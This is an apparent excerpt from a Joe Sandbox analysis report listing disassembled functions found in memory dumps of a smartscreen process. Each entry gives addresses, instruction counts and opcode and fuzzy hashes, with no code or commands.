                                                          • String ID:
                                                          • API String ID:
                                                          • Opcode ID: 0467cd6ee1088144a70b68dc02a3cfc58133e20d8a02460b49e04cf75999c977
                                                          • Instruction ID: 7d9326cd5f793b49ffe4412bfbc4e3721c75e6ca3d090e74029c01311f493075
                                                          • Opcode Fuzzy Hash: 0467cd6ee1088144a70b68dc02a3cfc58133e20d8a02460b49e04cf75999c977
                                                          • Instruction Fuzzy Hash: 3E016135A0D7898FE712DB6484A41DD7FB0EF42210F1646E7C485DB1A6E6345A498741
                                                          Function 00007FFD9B7960B9 Relevance: .0, Instructions: 45COMMON
                                                          Download Yara Rule
                                                          Memory Dump Source
                                                          • Source File: 0000001C.00000002.1874389719.00007FFD9B791000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B791000, based on PE: false
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_28_2_7ffd9b791000_smartscreen.jbxd
                                                          Similarity
                                                          • API ID:
                                                          • String ID:
                                                          • API String ID:
                                                          • Opcode ID: 94b4ccc65cfac5ee72174d0276deb6ad1693b4f4cd31ae28043c01ec4c465a20
                                                          • Instruction ID: de6f19105127588b44246a862b782af65475efe3578eba750878ba907127bc57
                                                          • Opcode Fuzzy Hash: 94b4ccc65cfac5ee72174d0276deb6ad1693b4f4cd31ae28043c01ec4c465a20
                                                          • Instruction Fuzzy Hash: 20019670E0D74D4EEBA8DB28446196D7BE1FF55300F1142BED49AC31A5DE3499418B41
                                                          Function 00007FFD9B79B5CD Relevance: .0, Instructions: 40COMMON
                                                          Download Yara Rule
                                                          Memory Dump Source
                                                          • Source File: 0000001C.00000002.1874389719.00007FFD9B791000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B791000, based on PE: false
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_28_2_7ffd9b791000_smartscreen.jbxd
                                                          Similarity
                                                          • API ID:
                                                          • String ID:
                                                          • API String ID:
                                                          • Opcode ID: 951245dc4ac24a3970e844a670a2205d19b56c639570e0b1112d56ab4cb7ebb3
                                                          • Instruction ID: 0c06f9ce267845d29defdd9b11ab9cc42d190bb25953948ec74da89eaae6121e
                                                          • Opcode Fuzzy Hash: 951245dc4ac24a3970e844a670a2205d19b56c639570e0b1112d56ab4cb7ebb3
                                                          • Instruction Fuzzy Hash: C1F0A460B1BA4E4BFA68E69C04A67B87282BF98750F590235D01DC22F2DD2835858251
                                                          Function 00007FFD9B764CE3 Relevance: .0, Instructions: 37COMMON
                                                          Download Yara Rule
                                                          Memory Dump Source
                                                          • Source File: 0000001C.00000002.1874389719.00007FFD9B760000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B760000, based on PE: false
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_28_2_7ffd9b760000_smartscreen.jbxd
                                                          Similarity
                                                          • API ID:
                                                          • String ID:
                                                          • API String ID:
                                                          • Opcode ID: 5554ce8cfa5bda4a09edcef3f4ce8531ce752d1f95435721850e8c5bd83630bd
                                                          • Instruction ID: c4e5703617728d7ba7fea5ee8646bd425bad09f8d07433ddbcedf704ffda3773
                                                          • Opcode Fuzzy Hash: 5554ce8cfa5bda4a09edcef3f4ce8531ce752d1f95435721850e8c5bd83630bd
                                                          • Instruction Fuzzy Hash: 78F03630A1951DCEEB68EA54D8A56F873A1FF54311F1501FDD00ED32B6DD386A814A05
                                                          Function 00007FFD9B760C50 Relevance: .0, Instructions: 34COMMON
                                                          Download Yara Rule
                                                          Memory Dump Source
                                                          • Source File: 0000001C.00000002.1874389719.00007FFD9B760000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B760000, based on PE: false
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_28_2_7ffd9b760000_smartscreen.jbxd
                                                          Similarity
                                                          • API ID:
                                                          • String ID:
                                                          • API String ID:
                                                          • Opcode ID: b72fb3ee4c4874d281bf465eb206aa26e7d75ac672da61a2efb48afe050a9171
                                                          • Instruction ID: 05695ddec1e21c0b8048f6d2b8dd29233180283ad5e4f303f82c4e51e85a1511
                                                          • Opcode Fuzzy Hash: b72fb3ee4c4874d281bf465eb206aa26e7d75ac672da61a2efb48afe050a9171
                                                          • Instruction Fuzzy Hash: B3018434A0D389CFE712DBA484941DDBFF0AF02314F1542E7C445DB1A6EA345A44C741
                                                          Function 00007FFD9B79AE89 Relevance: .0, Instructions: 34COMMON
                                                          Download Yara Rule
                                                          Memory Dump Source
                                                          • Source File: 0000001C.00000002.1874389719.00007FFD9B791000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B791000, based on PE: false
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_28_2_7ffd9b791000_smartscreen.jbxd
                                                          Similarity
                                                          • API ID:
                                                          • String ID:
                                                          • API String ID:
                                                          • Opcode ID: 5340eb465f1be2632332b662faba1890b0f3390e82b8188d8907982e352858d6
                                                          • Instruction ID: 8912e0204cc8023371e2aa6865f43643cb96ccf82467e960d6113502df15b0cb
                                                          • Opcode Fuzzy Hash: 5340eb465f1be2632332b662faba1890b0f3390e82b8188d8907982e352858d6
                                                          • Instruction Fuzzy Hash: 00F0E530B1C7880FC71A9A2958A54617BF1DF5B20534A42FFD49ACB2E3DD18AC458781
                                                          Function 00007FFD9B7937A9 Relevance: .0, Instructions: 29COMMON
                                                          Download Yara Rule
                                                          Memory Dump Source
                                                          • Source File: 0000001C.00000002.1874389719.00007FFD9B791000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B791000, based on PE: false
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_28_2_7ffd9b791000_smartscreen.jbxd
                                                          Similarity
                                                          • API ID:
                                                          • String ID:
                                                          • API String ID:
                                                          • Opcode ID: 47859c6f58e90711ab6b06573cb1aabaa5104090df94f09857e51303ad20489a
                                                          • Instruction ID: 34858df3f288d525c2a62e97ce5cb77128045e5e55fa82da786301a9885a5a9d
                                                          • Opcode Fuzzy Hash: 47859c6f58e90711ab6b06573cb1aabaa5104090df94f09857e51303ad20489a
                                                          • Instruction Fuzzy Hash: 66E09230B09B884FC70E9A29886D5607BA1EF6611278942EFC405CB1A3DA29DC84CB41
                                                          Function 00007FFD9B792529 Relevance: .0, Instructions: 29COMMON
                                                          Download Yara Rule
                                                          Memory Dump Source
                                                          • Source File: 0000001C.00000002.1874389719.00007FFD9B791000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B791000, based on PE: false
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_28_2_7ffd9b791000_smartscreen.jbxd
                                                          Similarity
                                                          • API ID:
                                                          • String ID:
                                                          • API String ID:
                                                          • Opcode ID: a018179314cd67ce9c05a12c8c6d728836e03d92886beaf26a4bf66f383ff318
                                                          • Instruction ID: 762811f1c07b93279ba39493ca447579e58ad3c125cb0ee0e92c01f8db1c4e37
                                                          • Opcode Fuzzy Hash: a018179314cd67ce9c05a12c8c6d728836e03d92886beaf26a4bf66f383ff318
                                                          • Instruction Fuzzy Hash: 68E09230B5A7854FC709AA3888695607BA1EF6710278952FFC446CB1A3DA28DC89C741
                                                          Function 00007FFD9B774B69 Relevance: .0, Instructions: 28COMMON
                                                          Download Yara Rule
                                                          Memory Dump Source
                                                          • Source File: 0000001C.00000002.1874389719.00007FFD9B770000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B770000, based on PE: false
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_28_2_7ffd9b770000_smartscreen.jbxd
                                                          Similarity
                                                          • API ID:
                                                          • String ID:
                                                          • API String ID:
                                                          • Opcode ID: e8475a065b3c08e857988ed0829737e564aeed36e7693f0b6b3802dd43ee8f93
                                                          • Instruction ID: ffde3ff3103f15b6b858ac260600c74e1821e03faf78a67506566a7edf3cb540
                                                          • Opcode Fuzzy Hash: e8475a065b3c08e857988ed0829737e564aeed36e7693f0b6b3802dd43ee8f93
                                                          • Instruction Fuzzy Hash: D5F0A031B0D60E8FFA28AA48D4A06BC7261EB40310F1243B9D41AC31F6DE39AE128690
                                                          Function 00007FFD9B76560A Relevance: .0, Instructions: 27COMMON
                                                          Download Yara Rule
                                                          Memory Dump Source
                                                          • Source File: 0000001C.00000002.1874389719.00007FFD9B760000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B760000, based on PE: false
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_28_2_7ffd9b760000_smartscreen.jbxd
                                                          Similarity
                                                          • API ID:
                                                          • String ID:
                                                          • API String ID:
                                                          • Opcode ID: ec35e2213699fc7d56f5bcb80efc954be6a810b370defc750019ec56b6c61d1e
                                                          • Instruction ID: d5940cba146c16b0edbbff5cba370d03bd6ce0b60e81d7c16d2ee0218abce3f2
                                                          • Opcode Fuzzy Hash: ec35e2213699fc7d56f5bcb80efc954be6a810b370defc750019ec56b6c61d1e
                                                          • Instruction Fuzzy Hash: 7DF0B434A0D3068BF3549284C4603A97394DF44310F154279E90E976F2CD286E818705
                                                          Function 00007FFD9B7610C0 Relevance: .0, Instructions: 27COMMON
                                                          Download Yara Rule
                                                          Memory Dump Source
                                                          • Source File: 0000001C.00000002.1874389719.00007FFD9B760000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B760000, based on PE: false
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_28_2_7ffd9b760000_smartscreen.jbxd
                                                          Similarity
                                                          • API ID:
                                                          • String ID:
                                                          • API String ID:
                                                          • Opcode ID: c508f57b1d6092f11738600fd498d3b9c8c4dab50b221eab1402aee9c8e7081c
                                                          • Instruction ID: ece0c0974daef638017fdd8e940f6fcf07eb8fe7f3b30d7148b935905f942088
                                                          • Opcode Fuzzy Hash: c508f57b1d6092f11738600fd498d3b9c8c4dab50b221eab1402aee9c8e7081c
                                                          • Instruction Fuzzy Hash: 38E02625F4C84D0AEB6CAA7428B25B57281DB85310B0501BAD01AC26DADC596CC14282
                                                          Function 00007FFD9B761CC5 Relevance: .0, Instructions: 27COMMON
                                                          Download Yara Rule
                                                          Memory Dump Source
                                                          • Source File: 0000001C.00000002.1874389719.00007FFD9B760000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B760000, based on PE: false
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_28_2_7ffd9b760000_smartscreen.jbxd
                                                          Similarity
                                                          • API ID:
                                                          • String ID:
                                                          • API String ID:
                                                          • Opcode ID: 799d60732668e79ca7c033eb013b33e7aeb406e7602c40a02ad940df537e136c
                                                          • Instruction ID: 494f2a8feec74dc9e8245dcfdc3878ad57f7ece8726dd7398cc6647d973ab343
                                                          • Opcode Fuzzy Hash: 799d60732668e79ca7c033eb013b33e7aeb406e7602c40a02ad940df537e136c
                                                          • Instruction Fuzzy Hash: F1E0EC15F0EA5BCEF7689A14447A5BC2382DF50355F454375D10E866F6ED5C3E064283
                                                          Function 00007FFD9B79618E Relevance: .0, Instructions: 26COMMON
                                                          Download Yara Rule
                                                          Memory Dump Source
                                                          • Source File: 0000001C.00000002.1874389719.00007FFD9B791000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B791000, based on PE: false
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_28_2_7ffd9b791000_smartscreen.jbxd
                                                          Similarity
                                                          • API ID:
                                                          • String ID:
                                                          • API String ID:
                                                          • Opcode ID: d3e5697d92d831851b0c404da935dffe1d13e18def46b9ecc965194742255821
                                                          • Instruction ID: 4dbcc223690bca2cadb859f0527fef4822aea533af61e0d079ae5e2a716e79d2
                                                          • Opcode Fuzzy Hash: d3e5697d92d831851b0c404da935dffe1d13e18def46b9ecc965194742255821
                                                          • Instruction Fuzzy Hash: 43F01C70E1861D8EEBA8DF59C882AACB7B0FB64340F654169D459D3265CA34A5468F80
                                                          Function 00007FFD9B7986B9 Relevance: .0, Instructions: 25COMMON
                                                          Download Yara Rule
                                                          Memory Dump Source
                                                          • Source File: 0000001C.00000002.1874389719.00007FFD9B791000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B791000, based on PE: false
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_28_2_7ffd9b791000_smartscreen.jbxd
                                                          Similarity
                                                          • API ID:
                                                          • String ID:
                                                          • API String ID:
                                                          • Opcode ID: 60e02ad3df73ae645880ed4de11b2b4d95edd1e9e69e6df9f56ec2e3d91379c2
                                                          • Instruction ID: 206070f4f76dd8aec91febe2a0b093977a54fd6e0732ecad5da23d8e4b0df8d2
                                                          • Opcode Fuzzy Hash: 60e02ad3df73ae645880ed4de11b2b4d95edd1e9e69e6df9f56ec2e3d91379c2
                                                          • Instruction Fuzzy Hash: 0EE04F30A1AB844FC70A9B2888699503BB0EF6B21178A40EBD449CB1B3D62DD848C712
                                                          Function 00007FFD9B797E29 Relevance: .0, Instructions: 24COMMON
                                                          Download Yara Rule
                                                          Memory Dump Source
                                                          • Source File: 0000001C.00000002.1874389719.00007FFD9B791000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B791000, based on PE: false
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_28_2_7ffd9b791000_smartscreen.jbxd
                                                          Similarity
                                                          • API ID:
                                                          • String ID:
                                                          • API String ID:
                                                          • Opcode ID: c0314b6be8dde890c1bbab9c0cc29e2b80965f8c3cce8f098a596a8cc3aba0eb
                                                          • Instruction ID: d5f71805f2d3b956d4049ee78b74e4c4af5d1ee39bf8f3acbeecfbc5eef2f748
                                                          • Opcode Fuzzy Hash: c0314b6be8dde890c1bbab9c0cc29e2b80965f8c3cce8f098a596a8cc3aba0eb
                                                          • Instruction Fuzzy Hash: 22E04F21A4A7C00FC30A663488698543BB1DF6721174A01D7D045CB5B3D51DDC4DC711
                                                          Function 00007FFD9B79DE68 Relevance: .0, Instructions: 23COMMON
                                                          Download Yara Rule
                                                          Memory Dump Source
                                                          • Source File: 0000001C.00000002.1874389719.00007FFD9B791000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B791000, based on PE: false
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_28_2_7ffd9b791000_smartscreen.jbxd
                                                          Similarity
                                                          • API ID:
                                                          • String ID:
                                                          • API String ID:
                                                          • Opcode ID: 9cf57cbc6f25681e89472532ded9f7eaeff93bd1b0f022a93c0a50ebe794988e
                                                          • Instruction ID: 3b0d5e8abd0ce2ca53a3bebe35a471ec98e7700fcc6ceb072126859dd7a35095
                                                          • Opcode Fuzzy Hash: 9cf57cbc6f25681e89472532ded9f7eaeff93bd1b0f022a93c0a50ebe794988e
                                                          • Instruction Fuzzy Hash: 4CE04F34A8D7804FC70A9B3888698503BB1EF5721174A80FFD045CF1B3DA2D9849C752
                                                          Function 00007FFD9B79A9F0 Relevance: .0, Instructions: 22COMMON
                                                          Download Yara Rule
                                                          Memory Dump Source
                                                          • Source File: 0000001C.00000002.1874389719.00007FFD9B791000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B791000, based on PE: false
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_28_2_7ffd9b791000_smartscreen.jbxd
                                                          Similarity
                                                          • API ID:
                                                          • String ID:
                                                          • API String ID:
                                                          • Opcode ID: 86516cfc4d8a0d480af8f07283063ca962ff981a2c8af2a83e93b7d611e3f089
                                                          • Instruction ID: 3b92578e4f7772e49ffbfe9f1dff6bdc011e0549b8a98965e61b2550fcb9a3e4
                                                          • Opcode Fuzzy Hash: 86516cfc4d8a0d480af8f07283063ca962ff981a2c8af2a83e93b7d611e3f089
                                                          • Instruction Fuzzy Hash: 41D0A930B10E0C4B8B0CB63D885C430B3D2E7B9202384536E940AC32A1ED26ECC9CB80
                                                          Function 00007FFD9B79A960 Relevance: .0, Instructions: 22COMMON
                                                          Download Yara Rule
                                                          Memory Dump Source
                                                          • Source File: 0000001C.00000002.1874389719.00007FFD9B791000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B791000, based on PE: false
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_28_2_7ffd9b791000_smartscreen.jbxd
                                                          Similarity
                                                          • API ID:
                                                          • String ID:
                                                          • API String ID:
                                                          • Opcode ID: 86516cfc4d8a0d480af8f07283063ca962ff981a2c8af2a83e93b7d611e3f089
                                                          • Instruction ID: 3b92578e4f7772e49ffbfe9f1dff6bdc011e0549b8a98965e61b2550fcb9a3e4
                                                          • Opcode Fuzzy Hash: 86516cfc4d8a0d480af8f07283063ca962ff981a2c8af2a83e93b7d611e3f089
                                                          • Instruction Fuzzy Hash: 41D0A930B10E0C4B8B0CB63D885C430B3D2E7B9202384536E940AC32A1ED26ECC9CB80
                                                          Function 00007FFD9B77BE4D Relevance: .0, Instructions: 22COMMON
                                                          Download Yara Rule
                                                          Memory Dump Source
                                                          • Source File: 0000001C.00000002.1874389719.00007FFD9B770000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B770000, based on PE: false
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_28_2_7ffd9b770000_smartscreen.jbxd
                                                          Similarity
                                                          • API ID:
                                                          • String ID:
                                                          • API String ID:
                                                          • Opcode ID: b06007b2d15cb476c392cbbefce1be8c6ad90f5c39c0958316e5efeaf6a74b02
                                                          • Instruction ID: 70a7c9c01eaabe15e3348d8fe264090bb421f1a0ba5a649b504df77a46688067
                                                          • Opcode Fuzzy Hash: b06007b2d15cb476c392cbbefce1be8c6ad90f5c39c0958316e5efeaf6a74b02
                                                          • Instruction Fuzzy Hash: 6AE01A32B0970A8FF725AA94C4E4AA93245EB54310F064675D849D72F2EEA8AA0056C1
                                                          Function 00007FFD9B799439 Relevance: .0, Instructions: 21COMMON
                                                          Download Yara Rule
                                                          Memory Dump Source
                                                          • Source File: 0000001C.00000002.1874389719.00007FFD9B791000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B791000, based on PE: false
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_28_2_7ffd9b791000_smartscreen.jbxd
                                                          Similarity
                                                          • API ID:
                                                          • String ID:
                                                          • API String ID:
                                                          • Opcode ID: ef3d8d036fab11cc71859aac51c511f020291b2c17e7915d4cbdb8d17a731c5b
                                                          • Instruction ID: f1fb9befa1aba3dcec86f37a9b6dbabc48013b5b22b7e1ee967b06db0b7b385b
                                                          • Opcode Fuzzy Hash: ef3d8d036fab11cc71859aac51c511f020291b2c17e7915d4cbdb8d17a731c5b
                                                          • Instruction Fuzzy Hash: 27E0123050A7844FC70A9B24C8A99903FB0EF2621178A01EBD409CF5B3DA1D9C49C751
                                                          Function 00007FFD9B79DDE9 Relevance: .0, Instructions: 21COMMON
                                                          Download Yara Rule
                                                          Memory Dump Source
                                                          • Source File: 0000001C.00000002.1874389719.00007FFD9B791000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B791000, based on PE: false
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_28_2_7ffd9b791000_smartscreen.jbxd
                                                          Similarity
                                                          • API ID:
                                                          • String ID:
                                                          • API String ID:
                                                          • Opcode ID: 5dca4974807c69a72bb291b6a7fa4e74e6263f6fbdbfe6379304d645b69b7791
                                                          • Instruction ID: a063e363b410a398e15121942b096283b7afccf0c641f26452569facfd339e81
                                                          • Opcode Fuzzy Hash: 5dca4974807c69a72bb291b6a7fa4e74e6263f6fbdbfe6379304d645b69b7791
                                                          • Instruction Fuzzy Hash: 24E01A3194E7C04FC70B973488698507FA0AE1721078A45EAC085CF1B3E6198849C701
                                                          Function 00007FFD9B760B95 Relevance: .0, Instructions: 19COMMON
                                                          Download Yara Rule
                                                          Memory Dump Source
                                                          • Source File: 0000001C.00000002.1874389719.00007FFD9B760000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B760000, based on PE: false
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_28_2_7ffd9b760000_smartscreen.jbxd
                                                          Similarity
                                                          • API ID:
                                                          • String ID:
                                                          • API String ID:
                                                          • Opcode ID: 01128ebb3b7ec0b5151aa04a1c0580f2a8b486cc2299b51aaf45d3f3ed769e8f
                                                          • Instruction ID: 428e5cf728696dce690f4856f8b083968de8d78956b2ef141a538e12728ca06b
                                                          • Opcode Fuzzy Hash: 01128ebb3b7ec0b5151aa04a1c0580f2a8b486cc2299b51aaf45d3f3ed769e8f
                                                          • Instruction Fuzzy Hash: CDD0A930229A4E8FDA00B77CC88A8247BA0FB0F210FCA10E1E008C75B2E60888A98701
                                                          Function 00007FFD9B7925D0 Relevance: .0, Instructions: 18COMMON
                                                          Download Yara Rule
                                                          Memory Dump Source
                                                          • Source File: 0000001C.00000002.1874389719.00007FFD9B791000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B791000, based on PE: false
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_28_2_7ffd9b791000_smartscreen.jbxd
                                                          Similarity
                                                          • API ID:
                                                          • String ID:
                                                          • API String ID:
                                                          • Opcode ID: 30b88120e300ce741a67909c90f8bad83c6bf9a8a2db7280cd1828b58fc114cc
                                                          • Instruction ID: 8f180aab2aa75e9180ee0f7869d42a8d0eff98467748f81fc95ef1229aac25a4
                                                          • Opcode Fuzzy Hash: 30b88120e300ce741a67909c90f8bad83c6bf9a8a2db7280cd1828b58fc114cc
                                                          • Instruction Fuzzy Hash: D2D01230750D084F8B4CF63C885996033D1E76D2167854059D00AC72B1E966DC89C741
                                                          Function 00007FFD9B79BC78 Relevance: .0, Instructions: 17COMMON
                                                          Download Yara Rule
                                                          Memory Dump Source
                                                          • Source File: 0000001C.00000002.1874389719.00007FFD9B791000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B791000, based on PE: false
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_28_2_7ffd9b791000_smartscreen.jbxd
                                                          Similarity
                                                          • API ID:
                                                          • String ID:
                                                          • API String ID:
                                                          • Opcode ID: 28d8733998a56753eaf3714d8c7a96fd320e2d6c2c6b6debb6d51310e0a97017
                                                          • Instruction ID: c4063fc3a21f7f5a6997ec60acdb5ad01519cf133be0afcd3963f33b0daf309b
                                                          • Opcode Fuzzy Hash: 28d8733998a56753eaf3714d8c7a96fd320e2d6c2c6b6debb6d51310e0a97017
                                                          • Instruction Fuzzy Hash: A2D01234B559044FC71CA638C89987473A1EB6A216B9541A9D00AC72B1D96ADD89C781
                                                          Function 00007FFD9B797480 Relevance: .0, Instructions: 17COMMON
                                                          Download Yara Rule
                                                          Memory Dump Source
                                                          • Source File: 0000001C.00000002.1874389719.00007FFD9B791000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B791000, based on PE: false
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_28_2_7ffd9b791000_smartscreen.jbxd
                                                          Similarity
                                                          • API ID:
                                                          • String ID:
                                                          • API String ID:
                                                          • Opcode ID: 7df4b55b0e60c0065be6ba464c6f623789a2d433318d44673c065b6b7d7e463f
                                                          • Instruction ID: ffa551e070a69a24c5ce1934b2239f7d7e8f5c3a6bdda62094c9b00d51ab11d4
                                                          • Opcode Fuzzy Hash: 7df4b55b0e60c0065be6ba464c6f623789a2d433318d44673c065b6b7d7e463f
                                                          • Instruction Fuzzy Hash: BBD01234B519044FC71CA638889A8747391EB6A21679551B9D00ACB2B1DA6ADD89C741
                                                          Function 00007FFD9B79DE78 Relevance: .0, Instructions: 16COMMON
                                                          Download Yara Rule
                                                          Memory Dump Source
                                                          • Source File: 0000001C.00000002.1874389719.00007FFD9B791000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B791000, based on PE: false
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_28_2_7ffd9b791000_smartscreen.jbxd
                                                          Similarity
                                                          • API ID:
                                                          • String ID:
                                                          • API String ID:
                                                          • Opcode ID: f640deda8df11f8bf0bdc2187046cea7d3ea58240c40a11107efbf69b68f1ebc
                                                          • Instruction ID: 1f0d11c4e6c9b18eac84674918e6d4f79f6a7e9df8659f39aad3d9b155a22c34
                                                          • Opcode Fuzzy Hash: f640deda8df11f8bf0bdc2187046cea7d3ea58240c40a11107efbf69b68f1ebc
                                                          • Instruction Fuzzy Hash: F7D0A77594A5844FCB5A9735C8ACC507F50DF6B21435540ECC00A8F2B3D929CD49C700
                                                          Function 00007FFD9B786E10 Relevance: .0, Instructions: 14COMMON
                                                          Download Yara Rule
                                                          Memory Dump Source
                                                          • Source File: 0000001C.00000002.1874389719.00007FFD9B784000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B784000, based on PE: false
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_28_2_7ffd9b784000_smartscreen.jbxd
                                                          Similarity
                                                          • API ID:
                                                          • String ID:
                                                          • API String ID:
                                                          • Opcode ID: 104acc72f31d9d09c7afd7aed4cdc5b30d692872643904b6d98eec7ee4f3d1b7
                                                          • Instruction ID: e32e11cf29b9d40dace6209a03f093c1e76c0aae4cd824451ea8229c5322c9e2
                                                          • Opcode Fuzzy Hash: 104acc72f31d9d09c7afd7aed4cdc5b30d692872643904b6d98eec7ee4f3d1b7
                                                          • Instruction Fuzzy Hash: 0BC04C11A5A92F4EE5B872B934521E8B0409B49214B462AF9E41CD51A6DC4D5E9102C6
                                                          Function 00007FFD9B7606AD Relevance: .0, Instructions: 13COMMON
                                                          Download Yara Rule
                                                          Memory Dump Source
                                                          • Source File: 0000001C.00000002.1874389719.00007FFD9B760000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B760000, based on PE: false
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_28_2_7ffd9b760000_smartscreen.jbxd
                                                          Similarity
                                                          • API ID:
                                                          • String ID:
                                                          • API String ID:
                                                          • Opcode ID: 5c1f25e0a95c736867b72634e4be5268a9db08ac9155d032615a6b6308ac3b74
                                                          • Instruction ID: 7aa13856ce0a2509d84b223f6b7d9800c3bd03e1d9bb254b1f2fc03e76ca40f3
                                                          • Opcode Fuzzy Hash: 5c1f25e0a95c736867b72634e4be5268a9db08ac9155d032615a6b6308ac3b74
                                                          • Instruction Fuzzy Hash: 66C08C00F1FB0F88E43931EE18A20ADB2004BD4A20FD30333C00E400B99C8E22C50147
                                                          Function 00007FFD9B760B18 Relevance: .0, Instructions: 12COMMON
                                                          Download Yara Rule
                                                          Memory Dump Source
                                                          • Source File: 0000001C.00000002.1874389719.00007FFD9B760000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B760000, based on PE: false
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_28_2_7ffd9b760000_smartscreen.jbxd
                                                          Similarity
                                                          • API ID:
                                                          • String ID:
                                                          • API String ID:
                                                          • Opcode ID: 7a9572e19ec2e53a62397a4cbd0f0f3e4eaebf5a3901d0cb9667c88de8518723
                                                          • Instruction ID: e8b85f89a94c07da1bb42ab3636755a0317d01951f143e107b0e71ce8bd191f3
                                                          • Opcode Fuzzy Hash: 7a9572e19ec2e53a62397a4cbd0f0f3e4eaebf5a3901d0cb9667c88de8518723
                                                          • Instruction Fuzzy Hash: 29C08C305298088FC900E72DC88480432A0FB0D210BC20190E00EC7170E21A9C81C702
                                                          Function 00007FFD9B7612D8 Relevance: .0, Instructions: 12COMMON
                                                          Download Yara Rule
                                                          Memory Dump Source
                                                          • Source File: 0000001C.00000002.1874389719.00007FFD9B760000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B760000, based on PE: false
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_28_2_7ffd9b760000_smartscreen.jbxd
                                                          Similarity
                                                          • API ID:
                                                          • String ID:
                                                          • API String ID:
                                                          • Opcode ID: fe1f07bad560b021fc5606da94808cc80d9bb50aaf5c47c17121d2f162821e36
                                                          • Instruction ID: 60a0e5e1c8d7b5a6b202f2686d5bc9aadee0aa8c3ef373c70128c864d5324f46
                                                          • Opcode Fuzzy Hash: fe1f07bad560b021fc5606da94808cc80d9bb50aaf5c47c17121d2f162821e36
                                                          • Instruction Fuzzy Hash: 33C08C3051190E8FC908EB28C88480433A0FB19200BC60090E009C7170E219DCC2C741
                                                          Function 00007FFD9B7606D0 Relevance: .0, Instructions: 8COMMON
                                                          Download Yara Rule
                                                          Memory Dump Source
                                                          • Source File: 0000001C.00000002.1874389719.00007FFD9B760000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B760000, based on PE: false
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_28_2_7ffd9b760000_smartscreen.jbxd
                                                          Similarity
                                                          • API ID:
                                                          • String ID:
                                                          • API String ID:
                                                          • Opcode ID: 8a38f57ed639fef3d88d11df78701187595349350ded237a282492a867519792
                                                          • Instruction ID: 9954da747b3cbc66ae4111696fbf3128a3121ce625bc8014a52c081f31b1a927
                                                          • Opcode Fuzzy Hash: 8a38f57ed639fef3d88d11df78701187595349350ded237a282492a867519792
                                                          • Instruction Fuzzy Hash: 7AB01200D67A0F44E42C31FA0C930A570405B45110FC20271D40C401B5988D12D40243
                                                          Function 00007FFD9B762279 Relevance: .0, Instructions: 6COMMON
                                                          Download Yara Rule
                                                          Memory Dump Source
                                                          • Source File: 0000001C.00000002.1874389719.00007FFD9B760000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B760000, based on PE: false
                                                          Joe Sandbox IDA Plugin
